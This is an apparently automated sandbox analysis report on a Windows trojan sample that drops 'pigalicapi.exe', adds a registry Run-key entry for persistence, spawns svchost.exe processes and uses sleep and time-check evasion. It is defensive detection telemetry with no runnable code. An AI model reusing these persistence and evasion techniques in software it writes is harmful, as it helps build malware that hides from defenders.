                Source: C:\Users\user\Desktop\EwK95WVtzI.exeCode function: 0_2_013F8A70 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptImportKey,CryptImportKey,CryptDecrypt,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,0_2_013F8A70
                Source: C:\Users\user\pigalicapi.exeCode function: 4_2_00A18800 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptGenKey,CryptExportKey,CryptImportKey,CryptExportKey,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,4_2_00A18800
                Source: C:\Users\user\pigalicapi.exeCode function: 4_2_00A18970 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptImportKey,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,4_2_00A18970
                Source: C:\Users\user\pigalicapi.exeCode function: 4_2_00A18A70 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptImportKey,CryptImportKey,CryptDecrypt,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,4_2_00A18A70
                Source: C:\Users\user\Desktop\EwK95WVtzI.exeCode function: 0_2_005012040_2_00501204
                Source: C:\Users\user\Desktop\EwK95WVtzI.exeCode function: 0_2_005100420_2_00510042
                Source: C:\Users\user\Desktop\EwK95WVtzI.exeCode function: 0_2_0050506E0_2_0050506E
                Source: C:\Users\user\Desktop\EwK95WVtzI.exeCode function: 0_2_005040250_2_00504025
                Source: C:\Users\user\Desktop\EwK95WVtzI.exeCode function: 0_2_005110CD0_2_005110CD
                Source: C:\Users\user\Desktop\EwK95WVtzI.exeCode function: 0_2_005044900_2_00504490
                Source: C:\Users\user\Desktop\EwK95WVtzI.exeCode function: 0_2_0051049E0_2_0051049E
                Source: C:\Users\user\Desktop\EwK95WVtzI.exeCode function: 0_2_0050FD320_2_0050FD32
                Source: C:\Users\user\Desktop\EwK95WVtzI.exeCode function: 0_2_00510D940_2_00510D94
                Source: C:\Users\user\Desktop\EwK95WVtzI.exeCode function: 0_2_00503D970_2_00503D97
                Source: C:\Users\user\Desktop\EwK95WVtzI.exeCode function: 0_2_00504D820_2_00504D82
                Source: C:\Users\user\Desktop\EwK95WVtzI.exeCode function: 0_2_0051167A0_2_0051167A
                Source: C:\Users\user\Desktop\EwK95WVtzI.exeCode function: 0_2_00506E380_2_00506E38
                Source: C:\Users\user\Desktop\EwK95WVtzI.exeCode function: 0_2_00511A930_2_00511A93
                Source: C:\Users\user\Desktop\EwK95WVtzI.exeCode function: 0_2_005106830_2_00510683
                Source: C:\Users\user\Desktop\EwK95WVtzI.exeCode function: 0_2_005037180_2_00503718
                Source: C:\Users\user\Desktop\EwK95WVtzI.exeCode function: 0_2_005047EE0_2_005047EE
                Source: C:\Users\user\Desktop\EwK95WVtzI.exeCode function: 0_2_014016980_2_01401698
                Source: C:\Users\user\Desktop\EwK95WVtzI.exeCode function: 0_2_00FE80A10_2_00FE80A1
                Source: C:\Users\user\pigalicapi.exeCode function: 4_2_005612044_2_00561204
                Source: C:\Users\user\pigalicapi.exeCode function: 4_2_005700424_2_00570042
                Source: C:\Users\user\pigalicapi.exeCode function: 4_2_0056506E4_2_0056506E
                Source: C:\Users\user\pigalicapi.exeCode function: 4_2_005640254_2_00564025
                Source: C:\Users\user\pigalicapi.exeCode function: 4_2_005710CD4_2_005710CD
                Source: C:\Users\user\pigalicapi.exeCode function: 4_2_005644904_2_00564490
                Source: C:\Users\user\pigalicapi.exeCode function: 4_2_0057049E4_2_0057049E
                Source: C:\Users\user\pigalicapi.exeCode function: 4_2_0056FD324_2_0056FD32
                Source: C:\Users\user\pigalicapi.exeCode function: 4_2_00563D974_2_00563D97
                Source: C:\Users\user\pigalicapi.exeCode function: 4_2_00570D944_2_00570D94
                Source: C:\Users\user\pigalicapi.exeCode function: 4_2_00564D824_2_00564D82
                Source: C:\Users\user\pigalicapi.exeCode function: 4_2_0057167A4_2_0057167A
                Source: C:\Users\user\pigalicapi.exeCode function: 4_2_00566E384_2_00566E38
                Source: C:\Users\user\pigalicapi.exeCode function: 4_2_00571A934_2_00571A93
                Source: C:\Users\user\pigalicapi.exeCode function: 4_2_005706834_2_00570683
                Source: C:\Users\user\pigalicapi.exeCode function: 4_2_005637184_2_00563718
                Source: C:\Users\user\pigalicapi.exeCode function: 4_2_005647EE4_2_005647EE
                Source: C:\Users\user\pigalicapi.exeCode function: 4_2_00A216984_2_00A21698
                Source: C:\Users\user\pigalicapi.exeCode function: 4_2_009D80A14_2_009D80A1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0408A6BA6_2_0408A6BA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_04007F796_2_04007F79
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_040077996_2_04007799
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0400B9356_2_0400B935
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_040072C46_2_040072C4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_04007B6D6_2_04007B6D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_040083996_2_04008399
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_13147B048_2_13147B04
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_13146FB28_2_13146FB2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_1314F2B28_2_1314F2B2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_1314F6DD8_2_1314F6DD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_1314FD128_2_1314FD12
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_131495918_2_13149591
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_131525808_2_13152580
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_13147B1411_2_13147B14
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_13146FC211_2_13146FC2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_1314F2C211_2_1314F2C2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_1314F6ED11_2_1314F6ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_1314FD2211_2_1314FD22
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_1315259011_2_13152590
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_131495A111_2_131495A1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_13147B1412_2_13147B14
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_13146FC212_2_13146FC2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_1314F2C212_2_1314F2C2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_1314F6ED12_2_1314F6ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_1314FD2212_2_1314FD22
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_1315259012_2_13152590
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_131495A112_2_131495A1
                Source: EwK95WVtzI.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: EwK95WVtzI.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\EwK95WVtzI.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\414045e2d09286d5db2581e0d955d358_9e146be9-c76a-4720-bcdb-53011b87bd06Jump to behavior
                Source: classification engineClassification label: mal100.spre.troj.evad.winEXE@18/4@2394/100
                Source: EwK95WVtzI.exeReversingLabs: Detection: 21%
                Source: EwK95WVtzI.exeVirustotal: Detection: 30%
                Source: C:\Users\user\Desktop\EwK95WVtzI.exeFile read: C:\Users\user\Desktop\EwK95WVtzI.exeJump to behavior
                Source: C:\Users\user\Desktop\EwK95WVtzI.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\EwK95WVtzI.exe C:\Users\user\Desktop\EwK95WVtzI.exe
                Source: unknownProcess created: C:\Users\user\pigalicapi.exe "C:\Users\user\pigalicapi.exe"
                Source: C:\Users\user\Desktop\EwK95WVtzI.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
                Source: C:\Users\user\pigalicapi.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
                Source: C:\Users\user\Desktop\EwK95WVtzI.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
                Source: C:\Users\user\pigalicapi.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
                Source: C:\Users\user\Desktop\EwK95WVtzI.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                Source: C:\Users\user\Desktop\EwK95WVtzI.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                Source: C:\Users\user\pigalicapi.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                Source: C:\Users\user\pigalicapi.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                Source: C:\Users\user\Desktop\EwK95WVtzI.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_1314515F OpenProcessToken,LookupPrivilegeValueA,CloseHandle,AdjustTokenPrivileges,GetLastError,8_2_1314515F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_1314516F OpenProcessToken,LookupPrivilegeValueA,CloseHandle,AdjustTokenPrivileges,GetLastError,11_2_1314516F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_1314516F OpenProcessToken,LookupPrivilegeValueA,CloseHandle,AdjustTokenPrivileges,GetLastError,12_2_1314516F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_04001660 CoCreateInstance,8_2_04001660
                Source: C:\Users\user\Desktop\EwK95WVtzI.exeCode function: 0_2_013F1CA0 CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,Process32Next,Process32First,lstrlenA,lstrcpyA,OpenProcess,EnumProcessModules,K32EnumProcessModules,GetModuleFileNameExA,GetProcessImageFileNameA,K32GetProcessImageFileNameA,FindCloseChangeNotification,Process32Next,CloseHandle,0_2_013F1CA0
                Source: C:\Windows\SysWOW64\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\zczoiir65502
                Source: C:\Users\user\Desktop\EwK95WVtzI.exeMutant created: \Sessions\1\BaseNamedObjects\pigalicapi
                Source: C:\Windows\SysWOW64\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\rjsfitz60229
                Source: C:\Windows\SysWOW64\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\pvoaiwz6588
                Source: C:\Users\user\Desktop\EwK95WVtzI.exeCommand line argument: xnT0_2_00504025
                Source: C:\Users\user\Desktop\EwK95WVtzI.exeCommand line argument: xnT0_2_00504025
                Source: C:\Users\user\Desktop\EwK95WVtzI.exeCommand line argument: xnT0_2_00504025
                Source: C:\Users\user\Desktop\EwK95WVtzI.exeCommand line argument: xnT0_2_00504025
                Source: C:\Users\user\Desktop\EwK95WVtzI.exeCommand line argument: xnT0_2_00504025
                Source: C:\Users\user\Desktop\EwK95WVtzI.exeCommand line argument: xnT0_2_00504025
                Source: C:\Users\user\Desktop\EwK95WVtzI.exeCommand line argument: xnT0_2_00504025
                Source: C:\Users\user\Desktop\EwK95WVtzI.exeCommand line argument: xnT0_2_00504025
                Source: C:\Users\user\Desktop\EwK95WVtzI.exeCommand line argument: xnT0_2_00504025
                Source: C:\Users\user\Desktop\EwK95WVtzI.exeCommand line argument: xnT0_2_00504025
                Source: C:\Users\user\Desktop\EwK95WVtzI.exeCommand line argument: xnT0_2_00504025
                Source: C:\Users\user\Desktop\EwK95WVtzI.exeCommand line argument: xnT0_2_00504025
                Source: C:\Users\user\Desktop\EwK95WVtzI.exeCommand line argument: xnT0_2_00504025
                Source: C:\Users\user\Desktop\EwK95WVtzI.exeCommand line argument: xnT0_2_00504025
                Source: C:\Users\user\Desktop\EwK95WVtzI.exeCommand line argument: xnT0_2_00504025
                Source: C:\Users\user\Desktop\EwK95WVtzI.exeCommand line argument: xnT0_2_00504025
                Source: C:\Users\user\Desktop\EwK95WVtzI.exeCommand line argument: xnT0_2_00504025
                Source: C:\Users\user\Desktop\EwK95WVtzI.exeCommand line argument: xnT0_2_00504025
                Source: C:\Users\user\Desktop\EwK95WVtzI.exeCommand line argument: xnT0_2_00504025
                Source: C:\Users\user\pigalicapi.exeCommand line argument: xnZ4_2_00564025
                Source: C:\Users\user\pigalicapi.exeCommand line argument: xnZ4_2_00564025
                Source: C:\Users\user\pigalicapi.exeCommand line argument: xnZ4_2_00564025
                Source: C:\Users\user\pigalicapi.exeCommand line argument: xnZ4_2_00564025
                Source: C:\Users\user\pigalicapi.exeCommand line argument: xnZ4_2_00564025
                Source: C:\Users\user\pigalicapi.exeCommand line argument: xnZ4_2_00564025
                Source: C:\Users\user\pigalicapi.exeCommand line argument: xnZ4_2_00564025
                Source: C:\Users\user\pigalicapi.exeCommand line argument: xnZ4_2_00564025
                Source: C:\Users\user\pigalicapi.exeCommand line argument: xnZ4_2_00564025
                Source: C:\Users\user\pigalicapi.exeCommand line argument: xnZ4_2_00564025
                Source: C:\Users\user\pigalicapi.exeCommand line argument: xnZ4_2_00564025
                Source: C:\Users\user\pigalicapi.exeCommand line argument: xnZ4_2_00564025
                Source: C:\Users\user\pigalicapi.exeCommand line argument: xnZ4_2_00564025
                Source: C:\Users\user\pigalicapi.exeCommand line argument: xnZ4_2_00564025
                Source: C:\Users\user\pigalicapi.exeCommand line argument: xnZ4_2_00564025
                Source: C:\Users\user\pigalicapi.exeCommand line argument: xnZ4_2_00564025
                Source: C:\Users\user\pigalicapi.exeCommand line argument: xnZ4_2_00564025
                Source: C:\Users\user\pigalicapi.exeCommand line argument: xnZ4_2_00564025
                Source: C:\Users\user\pigalicapi.exeCommand line argument: xnZ4_2_00564025
                Source: EwK95WVtzI.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: EwK95WVtzI.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: EwK95WVtzI.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: EwK95WVtzI.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: EwK95WVtzI.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: EwK95WVtzI.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: EwK95WVtzI.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT
                Source: EwK95WVtzI.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: EwK95WVtzI.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: EwK95WVtzI.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: EwK95WVtzI.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: EwK95WVtzI.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: EwK95WVtzI.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\EwK95WVtzI.exeCode function: 0_2_0050A566 push ecx; ret 0_2_0050A579
                Source: C:\Users\user\pigalicapi.exeCode function: 4_2_0056A566 push ecx; ret 4_2_0056A579
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_04009D2D push ecx; ret 6_2_04009D40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_04000E0A push ebp; ret 6_2_04000E0B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0408B08C push es; iretd 6_2_0408B09A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0408B0CB push 7240BFEDh; ret 6_2_0408B0D2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0408A9BB push E44F2B70h; ret 6_2_0408AA63
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0408AA04 push E44F2B70h; ret 6_2_0408AA63
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0408B378 push eax; ret 6_2_0408B389
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0408B3D9 pushfd ; ret 6_2_0408B3E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_04004546 push eax; ret 8_2_0400455C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0400428B push es; iretd 8_2_04004299
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_04004596 push eax; ret 8_2_0400455C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_04004596 pushfd ; ret 8_2_040045AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_040042C6 push 7240BFEDh; ret 8_2_040042CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_13158B29 push FFFFFFBBh; retf 8_2_13158B2B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_131597F3 push ss; iretd 8_2_131597FE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_13158E94 push cs; ret 8_2_13158E97
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_13152561 push ecx; ret 8_2_13152574
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_1315A460 push esi; iretd 8_2_1315A46A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_13159CFF push ebp; iretd 8_2_13159D04
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_1315873D push es; ret 11_2_1315874C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_13159767 push edx; retf 11_2_13159768
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_13158E1E push es; iretd 11_2_13158E21
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_13159D06 push ebx; retf 11_2_13159D07
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_13152571 push ecx; ret 11_2_13152584
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_13159DFD push esp; iretd 11_2_13159E07
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_13152571 push ecx; ret 12_2_13152584
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0408BF20 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,6_2_0408BF20

                Persistence and Installation Behavior

                barindex
                Source: Yara matchFile source: 4.2.pigalicapi.exe.a10000.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.EwK95WVtzI.exe.13f0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.EwK95WVtzI.exe.13f0000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.svchost.exe.4000000.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.svchost.exe.4000000.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.pigalicapi.exe.a10000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2743016042.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2743752559.0000000000A10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\EwK95WVtzI.exeFile created: C:\Users\user\pigalicapi.exeJump to dropped file
                Source: C:\Users\user\Desktop\EwK95WVtzI.exeFile created: C:\Users\user\pigalicapi.exeJump to dropped file

                Boot Survival

                barindex
                Source: C:\Users\user\Desktop\EwK95WVtzI.exeFile created: C:\Users\user\pigalicapi.exeJump to dropped file
                Source: C:\Users\user\Desktop\EwK95WVtzI.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run pigalicapiJump to behavior
                Source: C:\Users\user\Desktop\EwK95WVtzI.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run pigalicapiJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Windows\SysWOW64\svchost.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleep
                Source: C:\Windows\SysWOW64\svchost.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcess
                Source: C:\Users\user\pigalicapi.exeStalling execution: Execution stalls by calling Sleepgraph_4-11455
                Source: C:\Windows\SysWOW64\svchost.exeFile opened: \Device\Afd\Endpoint count: 41922
                Source: C:\Users\user\Desktop\EwK95WVtzI.exeCode function: EntryPoint,GetModuleFileNameA,SetUnhandledExceptionFilter,CoInitialize,StrStrIA,WSAStartup,VirtualFree,Sleep,ExitProcess,0_2_013F3B00
                Source: C:\Users\user\pigalicapi.exeCode function: EntryPoint,GetModuleFileNameA,SetUnhandledExceptionFilter,CoInitialize,StrStrIA,WSAStartup,VirtualFree,Sleep,ExitProcess,4_2_00A13B00
                Source: C:\Users\user\Desktop\EwK95WVtzI.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_0-11403
                Source: C:\Users\user\pigalicapi.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_4-11404
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_1314E0128_2_1314E012
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_1314E02211_2_1314E022
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_1314E02212_2_1314E022
                Source: C:\Windows\SysWOW64\svchost.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
                Source: C:\Users\user\Desktop\EwK95WVtzI.exe TID: 7404Thread sleep time: -70000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\EwK95WVtzI.exe TID: 7884Thread sleep time: -45000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\EwK95WVtzI.exe TID: 7308Thread sleep time: -21600000s >= -30000sJump to behavior
                Source: C:\Users\user\pigalicapi.exe TID: 7928Thread sleep time: -35000s >= -30000sJump to behavior
                Source: C:\Users\user\pigalicapi.exe TID: 8124Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Users\user\pigalicapi.exe TID: 7844Thread sleep time: -21600000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 8120Thread sleep count: 39 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 564Thread sleep count: 49 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 564Thread sleep time: -245000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 5172Thread sleep count: 57 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 2152Thread sleep count: 599 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 23044Thread sleep count: 360 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 23044Thread sleep count: 382 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 23040Thread sleep count: 495 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 23044Thread sleep count: 162 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 23044Thread sleep count: 232 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 23044Thread sleep count: 132 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 23044Thread sleep count: 86 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 23044Thread sleep count: 172 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 6736Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 4960Thread sleep count: 2287 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 7684Thread sleep count: 2231 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 7340Thread sleep time: -71589s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 7340Thread sleep time: -64001s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 7340Thread sleep time: -83015s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 7340Thread sleep time: -94307s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 7340Thread sleep time: -108359s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 7340Thread sleep time: -85058s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 7340Thread sleep time: -104700s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 6396Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 4824Thread sleep count: 1882 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 4896Thread sleep count: 1879 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 420Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 2684Thread sleep count: 826 > 30
                Source: C:\Windows\SysWOW64\svchost.exe TID: 4912Thread sleep count: 803 > 30
                Source: C:\Windows\SysWOW64\svchost.exe TID: 5892Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\svchost.exe TID: 23056Thread sleep count: 43 > 30
                Source: C:\Windows\SysWOW64\svchost.exe TID: 23056Thread sleep count: 96 > 30
                Source: C:\Users\user\Desktop\EwK95WVtzI.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_0-11831
                Source: C:\Users\user\pigalicapi.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_4-11832
                Source: C:\Users\user\Desktop\EwK95WVtzI.exeLast function: Thread delayed
                Source: C:\Users\user\pigalicapi.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\EwK95WVtzI.exeCode function: 0_2_013F1CA0 CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,Process32Next,Process32First,lstrlenA,lstrcpyA,OpenProcess,EnumProcessModules,K32EnumProcessModules,GetModuleFileNameExA,GetProcessImageFileNameA,K32GetProcessImageFileNameA,FindCloseChangeNotification,Process32Next,CloseHandle,0_2_013F1CA0
                Source: C:\Users\user\Desktop\EwK95WVtzI.exeThread delayed: delay time: 21600000Jump to behavior
                Source: C:\Users\user\pigalicapi.exeThread delayed: delay time: 21600000Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\svchost.exeWindow / User API: threadDelayed 599Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeWindow / User API: threadDelayed 360Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeWindow / User API: threadDelayed 382Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeWindow / User API: threadDelayed 495Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeWindow / User API: threadDelayed 2287Jump to behavior
